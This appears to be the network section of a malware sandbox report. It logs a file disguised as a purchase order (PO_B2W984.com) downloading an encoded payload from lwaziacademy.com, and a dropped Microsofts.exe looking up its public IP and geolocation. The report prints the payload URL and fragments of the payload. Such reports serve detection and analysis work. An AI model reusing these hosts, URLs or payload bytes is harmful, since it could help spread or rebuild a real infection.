Jan 3, 2025 02:47:10.745167017 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:10.745590925 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:10.745774031 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:10.745862961 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:10.746316910 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:10.746468067 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:10.746468067 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:10.746540070 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:10.787014008 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:10.787219048 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:10.787331104 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:10.787633896 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:10.787888050 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:10.788002014 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.064570904 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.064575911 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.064774990 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.064863920 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.065289974 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.065531015 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.066087008 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.066246033 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.066319942 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.066833973 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.067075014 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.067502975 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.067739010 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.068314075 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.068572998 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.069001913 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.069221973 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.069288015 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.069710970 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.069916964 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.069977045 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.070421934 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.070585966 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.070682049 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.071244001 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.071418047 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.071589947 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.071932077 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.072148085 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.072671890 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.072978020 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.073465109 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.073673964 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.073731899 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.074162006 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.074420929 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.074860096 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.075083971 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.075609922 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.075795889 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.075824022 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.076425076 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.076608896 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.076658010 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.077076912 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.077308893 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.077821970 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.077981949 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.078104019 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.078690052 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.079050064 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.079336882 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.079714060 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.080054045 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.080291986 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.080739021 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.080873013 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.080987930 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.081531048 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.081691027 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.081830978 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.082226038 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.082439899 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.082973957 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.083276987 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.083643913 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.083796024 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.083977938 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.084451914 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.084595919 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.084754944 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.085191011 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.085517883 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.085861921 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.086277962 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.086675882 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.086834908 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.086956024 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.087495089 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.087671995 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.087744951 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.088076115 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.088279963 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.088802099 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.089083910 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.089596033 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.089787006 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.089838028 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.090302944 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.090493917 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.090560913 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.091008902 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.091180086 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.091270924 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.091871023 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.092116117 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.092529058 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.092762947 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.093221903 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.093522072 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.093959093 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.094170094 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.094336033 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.094789028 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.094953060 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.095105886 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.095446110 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.095698118 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.104794025 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.104962111 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.105038881 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.105541945 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.105734110 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.105804920 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.106245995 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.106437922 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.106506109 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.107177019 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.107420921 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.109441996 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.109668970 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.109783888 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.110424995 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.110655069 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.111232042 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.111473083 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.112076044 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.112339973 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.112385035 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.112948895 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.113200903 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.113596916 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.113944054 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.148184061 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.148405075 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.148456097 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.148947954 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.149135113 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.149214029 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.149808884 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.150072098 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.425868034 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.425872087 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.426076889 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.426222086 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.426563978 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.426884890 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.427333117 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.427453995 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.427500010 CET  443    49747  41.185.8.252   192.168.11.20
Jan 3, 2025 02:47:11.427519083 CET  49747  443    192.168.11.20  41.185.8.252
Jan 3, 2025 02:47:11.427647114 CET  49747  443    192.168.11.20  41.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:11.427753925 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:11.428678989 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:11.428678989 CET49747443192.168.11.2041.185.8.252
                                                                                                                                      Jan 3, 2025 02:47:11.428690910 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:11.428694963 CET4434974741.185.8.252192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:13.711204052 CET4974880192.168.11.20132.226.8.169
                                                                                                                                      Jan 3, 2025 02:47:14.009445906 CET8049748132.226.8.169192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:14.009649992 CET4974880192.168.11.20132.226.8.169
                                                                                                                                      Jan 3, 2025 02:47:14.010780096 CET4974880192.168.11.20132.226.8.169
                                                                                                                                      Jan 3, 2025 02:47:14.308832884 CET8049748132.226.8.169192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:14.515010118 CET8049748132.226.8.169192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:14.518706083 CET4974880192.168.11.20132.226.8.169
                                                                                                                                      Jan 3, 2025 02:47:14.816755056 CET8049748132.226.8.169192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:14.839919090 CET8049748132.226.8.169192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:14.889411926 CET4974880192.168.11.20132.226.8.169
                                                                                                                                      Jan 3, 2025 02:47:14.977267027 CET49749443192.168.11.20104.21.67.152
                                                                                                                                      Jan 3, 2025 02:47:14.977288008 CET44349749104.21.67.152192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:14.977524042 CET49749443192.168.11.20104.21.67.152
                                                                                                                                      Jan 3, 2025 02:47:14.983047962 CET49749443192.168.11.20104.21.67.152
                                                                                                                                      Jan 3, 2025 02:47:14.983062029 CET44349749104.21.67.152192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:15.251434088 CET44349749104.21.67.152192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:15.251689911 CET49749443192.168.11.20104.21.67.152
                                                                                                                                      Jan 3, 2025 02:47:15.254473925 CET49749443192.168.11.20104.21.67.152
                                                                                                                                      Jan 3, 2025 02:47:15.254486084 CET44349749104.21.67.152192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:15.254776955 CET44349749104.21.67.152192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:15.281141043 CET49749443192.168.11.20104.21.67.152
                                                                                                                                      Jan 3, 2025 02:47:15.322205067 CET44349749104.21.67.152192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:15.946899891 CET44349749104.21.67.152192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:15.946965933 CET44349749104.21.67.152192.168.11.20
                                                                                                                                      Jan 3, 2025 02:47:15.947196960 CET49749443192.168.11.20104.21.67.152
                                                                                                                                      Jan 3, 2025 02:47:15.949033022 CET49749443192.168.11.20104.21.67.152
                                                                                                                                      Jan 3, 2025 02:48:19.837657928 CET8049748132.226.8.169192.168.11.20
                                                                                                                                      Jan 3, 2025 02:48:19.837960005 CET4974880192.168.11.20132.226.8.169
                                                                                                                                      Jan 3, 2025 02:48:54.859441042 CET4974880192.168.11.20132.226.8.169
                                                                                                                                      Jan 3, 2025 02:48:55.157519102 CET8049748132.226.8.169192.168.11.20
Timestamp                           Source Port  Dest Port  Source IP      Dest IP
Jan 3, 2025 02:47:06.125754118 CET  58936        53         192.168.11.20  1.1.1.1
Jan 3, 2025 02:47:07.132394075 CET  58936        53         192.168.11.20  9.9.9.9
Jan 3, 2025 02:47:07.773242950 CET  53           58936      9.9.9.9        192.168.11.20
Jan 3, 2025 02:47:08.025278091 CET  53           58936      1.1.1.1        192.168.11.20
Jan 3, 2025 02:47:13.575953007 CET  61215        53         192.168.11.20  9.9.9.9
Jan 3, 2025 02:47:13.705705881 CET  53           61215      9.9.9.9        192.168.11.20
Jan 3, 2025 02:47:14.842277050 CET  62627        53         192.168.11.20  9.9.9.9
Jan 3, 2025 02:47:14.976592064 CET  53           62627      9.9.9.9        192.168.11.20
Timestamp                           Source IP      Dest IP  Trans ID  OP Code             Name                 Type            Class        DNS over HTTPS
Jan 3, 2025 02:47:06.125754118 CET  192.168.11.20  1.1.1.1  0x2eb8    Standard query (0)  lwaziacademy.com     A (IP address)  IN (0x0001)  false
Jan 3, 2025 02:47:07.132394075 CET  192.168.11.20  9.9.9.9  0x2eb8    Standard query (0)  lwaziacademy.com     A (IP address)  IN (0x0001)  false
Jan 3, 2025 02:47:13.575953007 CET  192.168.11.20  9.9.9.9  0x369a    Standard query (0)  checkip.dyndns.org   A (IP address)  IN (0x0001)  false
Jan 3, 2025 02:47:14.842277050 CET  192.168.11.20  9.9.9.9  0x3a6a    Standard query (0)  reallyfreegeoip.org  A (IP address)  IN (0x0001)  false
Timestamp                           Source IP  Dest IP        Trans ID  Reply Code    Name                 CName               Address         Type                    Class        DNS over HTTPS
Jan 3, 2025 02:47:07.773242950 CET  9.9.9.9    192.168.11.20  0x2eb8    No error (0)  lwaziacademy.com     -                   41.185.8.252    A (IP address)          IN (0x0001)  false
Jan 3, 2025 02:47:08.025278091 CET  1.1.1.1    192.168.11.20  0x2eb8    No error (0)  lwaziacademy.com     -                   41.185.8.252    A (IP address)          IN (0x0001)  false
Jan 3, 2025 02:47:13.705705881 CET  9.9.9.9    192.168.11.20  0x369a    No error (0)  checkip.dyndns.org   checkip.dyndns.com  -               CNAME (Canonical name)  IN (0x0001)  false
Jan 3, 2025 02:47:13.705705881 CET  9.9.9.9    192.168.11.20  0x369a    No error (0)  checkip.dyndns.com   -                   132.226.8.169   A (IP address)          IN (0x0001)  false
Jan 3, 2025 02:47:13.705705881 CET  9.9.9.9    192.168.11.20  0x369a    No error (0)  checkip.dyndns.com   -                   132.226.247.73  A (IP address)          IN (0x0001)  false
Jan 3, 2025 02:47:13.705705881 CET  9.9.9.9    192.168.11.20  0x369a    No error (0)  checkip.dyndns.com   -                   158.101.44.242  A (IP address)          IN (0x0001)  false
Jan 3, 2025 02:47:13.705705881 CET  9.9.9.9    192.168.11.20  0x369a    No error (0)  checkip.dyndns.com   -                   193.122.6.168   A (IP address)          IN (0x0001)  false
Jan 3, 2025 02:47:13.705705881 CET  9.9.9.9    192.168.11.20  0x369a    No error (0)  checkip.dyndns.com   -                   193.122.130.0   A (IP address)          IN (0x0001)  false
Jan 3, 2025 02:47:14.976592064 CET  9.9.9.9    192.168.11.20  0x3a6a    No error (0)  reallyfreegeoip.org  -                   104.21.67.152   A (IP address)          IN (0x0001)  false
Jan 3, 2025 02:47:14.976592064 CET  9.9.9.9    192.168.11.20  0x3a6a    No error (0)  reallyfreegeoip.org  -                   172.67.177.134  A (IP address)          IN (0x0001)  false
• lwaziacademy.com
• reallyfreegeoip.org
• checkip.dyndns.org
Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
0           192.168.11.20  49748        132.226.8.169   80                4824  C:\Users\user\AppData\Local\Temp\Microsofts.exe

Timestamp                           Bytes transferred  Direction  Data
Jan 3, 2025 02:47:14.010780096 CET  151                OUT        GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 3, 2025 02:47:14.515010118 CET  276                IN         HTTP/1.1 200 OK
    Date: Fri, 03 Jan 2025 01:47:14 GMT
    Content-Type: text/html
    Content-Length: 107
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 33 2e 32 33 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.153.238</body></html>
Jan 3, 2025 02:47:14.518706083 CET  127                OUT        GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Jan 3, 2025 02:47:14.839919090 CET  276                IN         HTTP/1.1 200 OK
    Date: Fri, 03 Jan 2025 01:47:14 GMT
    Content-Type: text/html
    Content-Length: 107
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 33 2e 32 33 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.153.238</body></html>


Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
0           192.168.11.20  49747        41.185.8.252    443               5980  C:\Users\user\Desktop\PO_B2W984.com

Timestamp                Bytes transferred  Direction  Data
2025-01-03 01:47:08 UTC  169                OUT        GET /wps/200_Oupzhkprnvw HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: lwaziacademy.com
2025-01-03 01:47:09 UTC  183                IN         HTTP/1.1 200 OK
    Date: Fri, 03 Jan 2025 01:47:09 GMT
    Server: Apache
    Last-Modified: Fri, 20 Dec 2024 10:43:30 GMT
    Accept-Ranges: bytes
    Content-Length: 906612
    Connection: close
2025-01-03 01:47:09 UTC  8009               IN         Data Raw: 68 59 32 45 4f 41 4b 47 6b 43 72 2f 2f 76 72 74 2f 41 62 33 2f 41 54 74 41 66 54 74 39 51 55 43 38 50 66 74 37 76 30 41 41 50 54 76 2f 66 73 44 38 2f 66 74 2b 66 50 39 2b 76 6f 45 38 76 54 35 41 2f 48 75 2f 50 49 45 42 66 6b 46 39 77 62 76 39 41 62 31 2b 77 51 46 2f 76 44 76 41 4f 33 31 39 66 6a 7a 42 76 76 35 2b 75 2f 79 2f 66 44 34 2f 66 34 47 38 66 4c 30 41 76 62 30 37 2f 37 35 2b 34 57 4e 68 44 67 43 68 70 41 71 4f 51 48 38 42 76 54 33 2f 50 37 36 41 67 4f 46 6a 59 51 34 41 6f 61 51 4b 72 2b 37 70 70 65 49 7a 63 58 56 79 74 48 43 71 4d 54 44 7a 72 7a 4f 31 4a 2b 61 68 39 66 51 76 63 2f 42 32 4b 33 4b 78 63 62 56 79 37 36 6d 6a 6f 44 4a 78 4d 4b 37 7a 63 75 77 79 64 54 4f 31 63 6e 55 75 70 6d 51 7a 63 50 41 79 73 6d 37 6e 4d 62 51 78 74 6e 5a 32 5a 32
    Data Ascii: hY2EOAKGkCr//vrt/Ab3/ATtAfTt9QUC8Pft7v0AAPTv/fsD8/ft+fP9+voE8vT5A/Hu/PIEBfkF9wbv9Ab1+wQF/vDvAO319fjzBvv5+u/y/fD4/f4G8fL0Avb07/75+4WNhDgChpAqOQH8BvT3/P76AgOFjYQ4AoaQKr+7ppeIzcXVytHCqMTDzrzO1J+ah9fQvc/B2K3KxcbVy76mjoDJxMK7zcuwydTO1cnUupmQzcPAysm7nMbQxtnZ2Z2
2025-01-03 01:47:09 UTC  8000               IN         Data Raw: 44 50 45 30 65 58 68 69 68 62 73 73 35 53 50 68 72 45 45 32 44 68 2f 74 4b 51 62 37 30 39 6e 75 75 74 2b 43 4c 4d 53 6c 79 57 43 4e 4d 43 45 42 71 49 47 6c 75 4a 71 6b 78 6e 59 37 4d 6a 30 4c 34 6e 68 2f 78 45 34 6f 4d 76 38 74 5a 4c 79 72 5a 77 71 31 48 67 52 74 4f 70 6e 6f 42 2f 39 57 4b 42 34 4b 35 71 56 33 37 54 72 70 59 75 35 7a 51 55 32 4d 5a 74 62 2f 6b 36 42 32 37 52 56 54 55 43 6a 38 61 5a 64 69 61 4d 32 6b 4e 59 48 42 67 44 37 50 38 41 68 45 51 32 76 57 57 6f 71 66 30 6b 37 57 59 50 2b 54 57 37 64 39 39 68 77 61 54 4d 72 74 68 63 45 75 48 58 42 58 54 6f 32 66 65 6c 6c 4a 4b 66 51 33 34 6f 30 47 67 6b 2b 37 48 57 30 53 50 6c 5a 70 6a 32 65 33 45 65 31 59 66 6e 2f 69 55 6c 35 59 64 74 52 48 4e 4e 7a 63 53 45 62 58 47 39 33 70 70 41 54 78 53 57 41
    Data Ascii: DPE0eXhihbss5SPhrEE2Dh/tKQb709nuut+CLMSlyWCNMCEBqIGluJqkxnY7Mj0L4nh/xE4oMv8tZLyrZwq1HgRtOpnoB/9WKB4K5qV37TrpYu5zQU2MZtb/k6B27RVTUCj8aZdiaM2kNYHBgD7P8AhEQ2vWWoqf0k7WYP+TW7d99hwaTMrthcEuHXBXTo2fellJKfQ34o0Ggk+7HW0SPlZpj2e3Ee1Yfn/iUl5YdtRHNNzcSEbXG93ppATxSWA
2025-01-03 01:47:09 UTC  8000               IN         Data Raw: 6e 36 6f 6a 6f 59 71 46 67 63 38 54 34 45 45 6d 36 6b 5a 65 2b 45 4c 58 4a 32 71 49 34 52 2b 70 6a 51 57 45 67 57 7a 6f 2f 36 31 4d 36 33 48 68 75 59 78 58 55 61 31 47 76 7a 55 51 38 46 45 30 42 42 6e 2f 74 59 61 61 52 47 41 71 4d 35 74 69 34 67 67 77 78 61 63 68 74 48 67 33 70 55 6f 52 38 36 31 73 48 55 64 68 79 39 33 6e 78 57 6a 58 64 58 7a 77 2f 52 57 63 49 42 50 68 48 43 6a 6b 61 4d 4b 52 46 56 55 63 42 46 4f 4a 7a 6d 72 73 77 6b 73 7a 64 39 4c 4b 5a 31 77 79 69 48 4e 49 7a 30 37 70 58 6e 4d 30 6b 38 6e 52 69 6c 7a 61 6d 33 63 33 4f 42 56 79 57 47 51 42 69 37 79 54 6f 78 77 65 45 53 79 65 78 66 74 6f 33 6f 43 2f 66 61 4c 44 4e 6a 30 6a 46 43 4b 36 2b 64 6d 75 70 55 37 4c 2f 56 50 6b 4c 2f 54 31 42 61 30 4e 5a 75 33 61 59 52 52 2b 35 6d 53 38 44 6b 65
    Data Ascii: n6ojoYqFgc8T4EEm6kZe+ELXJ2qI4R+pjQWEgWzo/61M63HhuYxXUa1GvzUQ8FE0BBn/tYaaRGAqM5ti4ggwxachtHg3pUoR861sHUdhy93nxWjXdXzw/RWcIBPhHCjkaMKRFVUcBFOJzmrswkszd9LKZ1wyiHNIz07pXnM0k8nRilzam3c3OBVyWGQBi7yToxweESyexfto3oC/faLDNj0jFCK6+dmupU7L/VPkL/T1Ba0NZu3aYRR+5mS8Dke
